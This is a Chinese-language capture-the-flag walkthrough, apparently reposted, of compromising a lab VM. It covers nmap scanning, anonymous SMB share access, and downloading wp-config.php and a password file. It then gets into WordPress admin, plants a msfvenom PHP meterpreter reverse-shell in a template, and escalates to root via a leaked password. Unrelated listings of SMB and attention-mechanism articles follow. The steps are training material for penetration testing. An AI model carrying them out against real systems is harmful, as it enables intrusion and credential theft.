SMB信息泄露

article/2025/10/29 12:19:38

SMB信息泄露

1.确保攻击机和靶机处在同局域网/ 首先使用ifconfig命令查看本机IP地址

在这里插入图片描述

2.使用 nmap -sn -PE 192.168.56.0/24命令然后扫出靶机IP:192.168.56.103

在这里插入图片描述

3.使用nmap -sV 192.168.56.103 命令扫描靶机开放的服务端口

在这里插入图片描述

我们发现目标靶机有22,80,139,445,3306,6667 几个可能有用的端口开放,其中139和445进行的SMB服务

其中,使用计算机名访问时,SMB服务工作在NetBIOS协议之上,用的是TCP的139端口;使用IP地址访问时,用的是TCP的445端口。

针对SMB协议弱点分析
4.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看:
smbclient -L IP           //查看SMB文件目录
smbclient '\\IP\$share'   //查看SMB文件
get 敏感文件               //下载文件
5.针对SMB协议远程溢出漏洞进行分析
searchsploit samba版本号 //搜索smb远程溢出漏洞
6.使用命令: smbclient -L 192.168.56.103尝试空口令登录

在这里插入图片描述

7.使用命令:smbclient '\\192.168.56.103\share$' 空命令进入查看目录

在这里插入图片描述

8. 注意本目录下的deets.txt和wordpress目录下的wp-config.php ,这里将其下载到kali上

在这里插入图片描述

在这里插入图片描述

9. 打开deets.txt文件,找到一个密码信息:12345 也许有用

在这里插入图片描述

10.打开 wp-config.php文件,里面存有数据库的一些配置信息,我们找到数据库的账号密码。

在这里插入图片描述

使用命令:searchsploit samba版本号 尝试搜索存在的漏洞 发现不存在

在这里插入图片描述


深度挖掘

针对HTTP协议弱点分析
1.浏览器查看网站
2.使用dirb或nikto探测
3.寻找突破点,目标登陆后台,上传webshell

dirb http://192.168.56.103     //查看靶机目录
1.发现可疑目录,尝试浏览器打开

在这里插入图片描述

2.使用刚才 wp-config.php文件中的用户 密码 发现成功登录

在这里插入图片描述

3.我们进入了后台之后,在kali制作webshell 使用如下命令
 msfvenom -p php/meterpreter/reverse_tcp lhost= 本机IP lport=4444 -f raw

将制作好的webshell保存在桌面,以便使用
在这里插入图片描述

4. 启动metasploit,然后启动监听:
msfconsole                           //启动metasploit
msf > use exploit/multi/handler      //调用模块
msf exploit(handler) > set payload php/meterpreter/reverse_tcp    
msf exploit(handler) > set lhost kali机IP
msf exploit(handler) > set lport 4444           //端口
msf exploit(handler) > run

在这里插入图片描述

5.kali正在监听4444端口,接下来,我们上传webshell。打开火狐浏览器,进入后台页面,将404模板跟换为改成的webshell

在这里插入图片描述

6.接下来进入kali 发现监听成功 然后进入shell,发现用户权限不够,于是想到提权

在这里插入图片描述

python -c "import pty;pty.spawn('/bin/bash')"       #美化shell改成终端模式
7.使用命令 cat /etc/passwd查看用户信息,发现home目录下存在togie用户
cat  /etc/passwd
landscape:x:103:109::/var/lib/landscape:/bin/false
togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false
8. 我们切换成该用户,使用deets.txt的密码12345,成功切换

在这里插入图片描述

9.尝试切换root用户,进入root目录

在这里插入图片描述

10.cd到root目录,看到有proof.txt文件,打开文件拿到flag

在这里插入图片描述


http://chatgpt.dhexx.cn/article/W9CA1xpW.shtml

相关文章

smbclient命令查看Samba服务共享时出现报错“protocol negotiation failed: NT_STATUS_IO_TIMEOUT”

使用smbclient命令查看Samba服务共享了哪些目录时,报错了,报错信息:protocol negotiation failed: NT_STATUS_IO_TIMEOUT 解决方法: 注释掉网卡配置文件中的DNS, 重启网络 [rootmaster ~]# systemctl restart networ…

【Linux专题】SMB端口号说明

SMB端口号说明 SMB端口号是 TCP/445,还有一些说法是 SMB端口号还包括 137~139, 这种说法只是部分正确; 早期版本的 SMB(SMB 1.0) 最初设计为在 TCP/IP(NBT)上的 NetBIOS 上运行,它使用: TCP/139 进行会话服务(session services) TCP/UDP/137 进行名称服务(name se…

kali(linux) smbclient用法

Smb一般作为文件共享服务器,专门提供Linux与Windows之间的传送文件服务,在kali linux中提供了专用的客户端smbclient 下面就介绍一下其简单用法 如图:-U 后面跟用户名和密码,如果没有则不需要加-U 如图就可以使用linux的ls等命令进…

Linux常用命令——smbclient命令

在线Linux命令查询工具(http://www.lzltool.com/LinuxCommand) smbclient 交互方式访问samba服务器 补充说明 smbclient命令属于samba套件&#xff0c;它提供一种命令行使用交互式方式访问samba服务器的共享资源。 语法 smbclient(选项)(参数)选项 -B<ip地址>&…

注意力机制介绍(attention)

注意力机制是指我们将视觉注意力集中在图像的不同区域&#xff0c;或者将注意力集中在一句话中的某个词语&#xff0c;以下图为例&#xff1a; 人眼的视觉注意力允许我们以“高分辨率”关注某个特定区域&#xff08;例如黄色框内的耳朵&#xff09;同时以“低分辨率”处理周围的…

什么是注意力机制及其应用(self attention)?

一、引言 注意力机制是自深度学习快速发展后广泛应用于自然语言处理、统计学习、图像检测、语音识别等领域的核心技术&#xff0c;例如将注意力机制与RNN结合进行图像分类&#xff0c;将注意力机制运用在自然语言处理中提高翻译精度&#xff0c;注意力机制本质上说就是实现信息…

自注意力(Self-Attention)

一、自注意力机制概述 循环神经网络由于信息传递的容量以及梯度消失问题&#xff0c;实际上也只能建立短距离依赖关系。 为了建立长距离的依赖关系&#xff0c;可以增加网络的层数或者使用全连接网络。但是全连接网络无法处理变长的输入序列&#xff0c;另外&#xff0c;不同的…

5、注意力机制和Transformer模型

1、人类的视觉注意力 从注意力模型的命名方式看&#xff0c;很明显其借鉴了人类的注意力机制&#xff0c;因此&#xff0c;我们首先简单介绍人类视觉的选择性注意力机制。 视觉注意力机制是人类视觉所特有的大脑信号处理机制。人类视觉通过快速扫描全局图像&#xff0c;获得需…

注意力机制原理及其模型发展和应用

点击上方“小白学视觉”&#xff0c;选择加"星标"或“置顶” 重磅干货&#xff0c;第一时间送达 Attention机制在近几年来在图像&#xff0c;自然语言处理等领域中都取得了重要的突破&#xff0c;被证明有益于提高模型的性能。Attention机制本身也是符合人脑和人眼的…

深度解析注意力模型(attention model)

前言attention的内部结构是什么&#xff1f; 前言 这里学习的注意力模型是我在研究image caption过程中的出来的经验总结&#xff0c;其实这个注意力模型理解起来并不难&#xff0c;但是国内的博文写的都很不详细或说很不明确&#xff0c;我在看了 attention-mechanism后才完全…

图解自注意力机制

写在最前边 这个文章是《图解GPT-2 | The Illustrated GPT-2 (Visualizing Transformer Language Models)》的一部分&#xff0c;因为篇幅太长我就单独拿出来了。 当然如果你只想了解自注意力机制可以只看本文的前半部分。 后半部分主要是讲Masked Self-attention在GPT-2中的应…

NeurIPS 2021 | Twins:重新思考高效的视觉注意力模型设计

Twins 是美团和阿德莱德大学合作提出的视觉注意力模型&#xff0c;相关论文已被 NeurIPS 2021 会议接收。本文主要讲述 Twins 解决的难点、设计和实现思路&#xff0c;以及在美团场景的探索落地&#xff0c;希望能对从事视觉算法研发的同学有所帮助和启发。 导读 Twins [1] 是美…

深度理解机器学习20-注意力机制模型

人类的注意力机制&#xff08;Attention Mechanism&#xff09;是从直觉中得到&#xff0c;它是人类利用有限的注意力资源从大量信息中快速筛选出高价值信息的手段。深度学习中的注意力机制借鉴了人类的注意力思维方式&#xff0c;被广泛的应用在自然语言处理&#xff08;Natur…

人工智能之注意力模型

朋友们&#xff0c;如需转载请标明出处&#xff1a;人工智能AI技术的博客_CSDN博客-python系列教程,人工智能,程序人生领域博主 注意力模型 通过对教程中前面一些文章的学习&#xff0c;我们知道可以用上面的神经网络来实现机器翻译。假设要将一段法语句子翻译成英文句子。那么…

注意力之双线性模型注意力

本文主要针对两篇论文&#xff1a;双线性注意力网络模型和深度模块化注意力进行总结&#xff0c;加上自己对其的理解。若有不足&#xff0c;还望指出。 论文地址&#xff1a; 双线性注意力网络 深度模块化注意力 项目地址&#xff1a; 双线性注意力网络 深度模块化注意力 0. 写…

注意力模型CBAM

论文&#xff1a;CBAM: Convolutional Block Attention Module Convolutional Block Attention Module (CBAM) 表示卷积模块的注意力机制模块。是一种结合了空间&#xff08;spatial&#xff09;和通道&#xff08;channel&#xff09;的注意力机制模块。相比于senet只关注通道…

注意力模块

目前主流的注意力机制可以分为以下三种&#xff1a;通道注意力、空间注意力以及自注意力&#xff08;Self-attention&#xff09; 通道域旨在显示的建模出不同通道之间的相关性&#xff0c;通过网络学习的方式来自动获取到每个特征通道的重要程度&#xff0c;最后再为每个通道…

注意力机制学习

注意力机制学习 学习于博客https://blog.csdn.net/weixin_44791964/article/details/121371986 1.Channel Attention 1.1 SeNet 对于输入进来的特征层&#xff0c;关注其每一个通道的权重&#xff0c;让网络关注它最需要关注的通道。【channel不变&#xff0c;h,w变】 代表…

一般注意力模型

文章目录 一般注意力模型注意力输入注意力输出 一般注意力模型 描述一般注意力模型&#xff0c;首先要描述可以使用注意力的模型的一般特征。我们将这种模型称为任务模型&#xff0c;如图&#xff1a; 这个模型接受一个输入&#xff0c;执行指定的任务&#xff0c;然后产生所…

深度学习中的注意力机制模型及代码实现(SE Attention、CBAM Attention)

目录 常用的注意力机制模型 SE Attention CBAM Attention CBAM Attention 模型结构​ CBAM Attention 代码实现&#xff08;Pytorch版&#xff09;&#xff1a; 注意力机制加到网络的哪里合适 常用的注意力机制模型 常用的注意力机制多为SE Attention和CBAM Attention。它…